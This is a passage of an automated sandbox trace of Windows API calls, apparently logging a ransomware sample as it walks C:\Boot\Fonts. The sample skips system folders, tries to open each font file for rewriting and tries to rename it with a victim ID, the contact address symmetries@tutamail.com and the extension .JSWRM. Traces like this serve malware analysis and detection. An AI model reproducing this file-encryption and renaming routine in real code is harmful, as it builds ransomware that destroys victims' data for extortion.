lpNumberOfBytesRead=0x345f2d4*=0x0, lpOverlapped=0x0) returned 0 [0063.875] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0063.875] CloseHandle (hObject=0xffffffff) returned 1 [0063.875] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0063.875] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0063.875] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0063.875] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f84e8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0063.875] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0063.875] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0063.875] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0063.875] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2e8 [0063.875] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2e8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0063.875] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2e8 | out: hHeap=0x1e0000) returned 1 [0063.875] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0063.875] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x225bb0 [0063.875] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0063.875] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0063.875] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225bb0 | out: hHeap=0x1e0000) returned 1 [0063.875] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0063.875] MoveFileW (lpExistingFileName="C:\\Boot\\Fonts\\msjh_boot.ttf" (normalized: "c:\\boot\\fonts\\msjh_boot.ttf"), lpNewFileName="C:\\Boot\\Fonts\\msjh_boot.ttf.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\boot\\fonts\\msjh_boot.ttf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0063.875] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0063.875] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0063.875] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dec0 | out: hHeap=0x1e0000) returned 1 [0063.875] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4be7820, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef94dfcd, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2488a26, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x25b3b, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="msyhn_boot.ttf", cAlternateFileName="MSYHN_~1.TTF")) returned 1 [0063.875] lstrcmpiW (lpString1="msyhn_boot.ttf", lpString2=".") returned 1 [0063.876] lstrcmpiW (lpString1="msyhn_boot.ttf", lpString2="..") returned 1 [0063.876] lstrcmpiW (lpString1="msyhn_boot.ttf", lpString2="...") returned 1 [0063.876] lstrcmpiW (lpString1="msyhn_boot.ttf", lpString2="windows") returned -1 [0063.876] lstrcmpiW (lpString1="msyhn_boot.ttf", lpString2="recovery") returned -1 [0063.876] lstrcmpiW (lpString1="msyhn_boot.ttf", lpString2="perflogs") returned -1 [0063.876] lstrcmpiW (lpString1="msyhn_boot.ttf", lpString2="documents and settings") returned 1 [0063.876] lstrcmpiW (lpString1="msyhn_boot.ttf", lpString2="$RECYCLE.BIN") returned 1 [0063.876] lstrcmpiW (lpString1="msyhn_boot.ttf", lpString2="system volume information") returned -1 [0063.876] lstrcmpiW (lpString1="msyhn_boot.ttf", lpString2="msocache") returned 1 [0063.876] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0063.876] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msyhn_boot.ttf", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0063.876] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msyhn_boot.ttf", cchWideChar=14, lpMultiByteStr=0x345f610, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msyhn_boot.ttf", lpUsedDefaultChar=0x0) returned 14 [0063.876] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0063.876] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0063.876] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msyhn_boot.ttf", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0063.876] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msyhn_boot.ttf", cchWideChar=14, lpMultiByteStr=0x345f5e0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msyhn_boot.ttf", lpUsedDefaultChar=0x0) returned 14 [0063.876] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0063.876] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0063.876] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0063.876] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0063.876] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0063.876] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dec0 [0063.876] CreateFileW (lpFileName="C:\\Boot\\Fonts\\msyhn_boot.ttf" (normalized: "c:\\boot\\fonts\\msyhn_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0063.876] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=9256135561371328) returned 0 [0063.876] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0063.876] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2471a8 [0063.876] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x2471a8, lpNumberOfBytesRead=0x345f2d4*=0x0, lpOverlapped=0x0) returned 0 [0063.877] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0063.877] CloseHandle (hObject=0xffffffff) returned 1 [0063.877] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0063.877] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0063.877] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0063.877] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8638, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0063.877] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0063.877] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0063.877] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0063.877] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0063.877] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0063.877] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0063.877] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c220 [0063.877] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x226730 [0063.877] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c220 | out: hHeap=0x1e0000) returned 1 [0063.877] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0063.877] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x226730 | out: hHeap=0x1e0000) returned 1 [0063.877] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0063.877] MoveFileW (lpExistingFileName="C:\\Boot\\Fonts\\msyhn_boot.ttf" (normalized: "c:\\boot\\fonts\\msyhn_boot.ttf"), lpNewFileName="C:\\Boot\\Fonts\\msyhn_boot.ttf.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\boot\\fonts\\msyhn_boot.ttf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0063.877] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0063.877] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0063.877] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dec0 | out: hHeap=0x1e0000) returned 1 [0063.877] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4be7820, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef95f141, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2488a26, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x26255, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="msyh_boot.ttf", cAlternateFileName="MSYH_B~1.TTF")) returned 1 [0063.877] lstrcmpiW (lpString1="msyh_boot.ttf", lpString2=".") returned 1 [0063.877] lstrcmpiW (lpString1="msyh_boot.ttf", lpString2="..") returned 1 [0063.877] lstrcmpiW (lpString1="msyh_boot.ttf", lpString2="...") returned 1 [0063.877] lstrcmpiW (lpString1="msyh_boot.ttf", lpString2="windows") returned -1 [0063.877] lstrcmpiW (lpString1="msyh_boot.ttf", lpString2="recovery") returned -1 [0063.877] lstrcmpiW (lpString1="msyh_boot.ttf", lpString2="perflogs") returned -1 [0063.877] lstrcmpiW (lpString1="msyh_boot.ttf", lpString2="documents and settings") returned 1 [0063.877] lstrcmpiW (lpString1="msyh_boot.ttf", lpString2="$RECYCLE.BIN") returned 1 [0063.878] lstrcmpiW (lpString1="msyh_boot.ttf", lpString2="system volume information") returned -1 [0063.878] lstrcmpiW (lpString1="msyh_boot.ttf", lpString2="msocache") returned 1 [0063.878] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0063.878] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msyh_boot.ttf", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0063.878] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msyh_boot.ttf", cchWideChar=13, lpMultiByteStr=0x345f610, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msyh_boot.ttf", lpUsedDefaultChar=0x0) returned 13 [0063.878] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0063.878] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0063.878] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msyh_boot.ttf", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0063.878] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msyh_boot.ttf", cchWideChar=13, lpMultiByteStr=0x345f5e0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msyh_boot.ttf", lpUsedDefaultChar=0x0) returned 13 [0063.878] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0063.878] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0063.878] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0063.878] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0063.878] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0063.878] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0063.878] CreateFileW (lpFileName="C:\\Boot\\Fonts\\msyh_boot.ttf" (normalized: "c:\\boot\\fonts\\msyh_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0063.878] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=9257990987244136) returned 0 [0063.878] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0063.878] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2471a8 [0063.878] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x2471a8, lpNumberOfBytesRead=0x345f2d4*=0x0, lpOverlapped=0x0) returned 0 [0063.878] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0063.878] CloseHandle (hObject=0xffffffff) returned 1 [0063.878] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0063.878] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0063.878] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0063.878] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8638, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0063.878] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0063.878] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0063.878] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0063.878] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0063.879] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0063.879] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0063.879] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0063.879] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x226630 [0063.879] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0063.879] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0063.879] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x226630 | out: hHeap=0x1e0000) returned 1 [0063.879] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0063.879] MoveFileW (lpExistingFileName="C:\\Boot\\Fonts\\msyh_boot.ttf" (normalized: "c:\\boot\\fonts\\msyh_boot.ttf"), lpNewFileName="C:\\Boot\\Fonts\\msyh_boot.ttf.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\boot\\fonts\\msyh_boot.ttf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0063.879] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0063.879] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0063.879] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0063.879] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4be7820, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef96ef3e, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf24aec9d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xaf3b, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="segmono_boot.ttf", cAlternateFileName="SEGMON~1.TTF")) returned 1 [0063.879] lstrcmpiW (lpString1="segmono_boot.ttf", lpString2=".") returned 1 [0063.879] lstrcmpiW (lpString1="segmono_boot.ttf", lpString2="..") returned 1 [0063.879] lstrcmpiW (lpString1="segmono_boot.ttf", lpString2="...") returned 1 [0063.879] lstrcmpiW (lpString1="segmono_boot.ttf", lpString2="windows") returned -1 [0063.879] lstrcmpiW (lpString1="segmono_boot.ttf", lpString2="recovery") returned 1 [0063.879] lstrcmpiW (lpString1="segmono_boot.ttf", lpString2="perflogs") returned 1 [0063.879] lstrcmpiW (lpString1="segmono_boot.ttf", lpString2="documents and settings") returned 1 [0063.879] lstrcmpiW (lpString1="segmono_boot.ttf", lpString2="$RECYCLE.BIN") returned 1 [0063.879] lstrcmpiW (lpString1="segmono_boot.ttf", lpString2="system volume information") returned -1 [0063.879] lstrcmpiW (lpString1="segmono_boot.ttf", lpString2="msocache") returned 1 [0063.879] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0063.879] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="segmono_boot.ttf", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0063.879] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0063.879] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="segmono_boot.ttf", cchWideChar=16, lpMultiByteStr=0x241060, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="segmono_boot.ttf", lpUsedDefaultChar=0x0) returned 16 [0063.879] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0063.879] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0063.879] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="segmono_boot.ttf", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0063.879] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0063.879] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="segmono_boot.ttf", cchWideChar=16, lpMultiByteStr=0x2411c8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="segmono_boot.ttf", lpUsedDefaultChar=0x0) returned 16 [0063.880] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0063.880] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0063.880] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0063.880] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0063.880] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0063.880] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0063.880] CreateFileW (lpFileName="C:\\Boot\\Fonts\\segmono_boot.ttf" (normalized: "c:\\boot\\fonts\\segmono_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0063.881] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=9256135561372696) returned 0 [0063.881] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0063.881] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2471a8 [0063.881] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x2471a8, lpNumberOfBytesRead=0x345f2d4*=0x0, lpOverlapped=0x0) returned 0 [0063.881] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0063.881] CloseHandle (hObject=0xffffffff) returned 1 [0063.881] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0063.881] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0063.881] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0063.881] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f84e8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0063.881] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8670 [0063.881] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0063.881] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0063.881] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0063.881] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0063.881] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0063.881] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bf08 [0063.881] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x225fb0 [0063.881] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bf08 | out: hHeap=0x1e0000) returned 1 [0063.881] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0063.881] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225fb0 | out: hHeap=0x1e0000) returned 1 [0063.881] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8670 | out: hHeap=0x1e0000) returned 1 [0063.881] MoveFileW (lpExistingFileName="C:\\Boot\\Fonts\\segmono_boot.ttf" (normalized: "c:\\boot\\fonts\\segmono_boot.ttf"), lpNewFileName="C:\\Boot\\Fonts\\segmono_boot.ttf.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\boot\\fonts\\segmono_boot.ttf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0063.881] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: 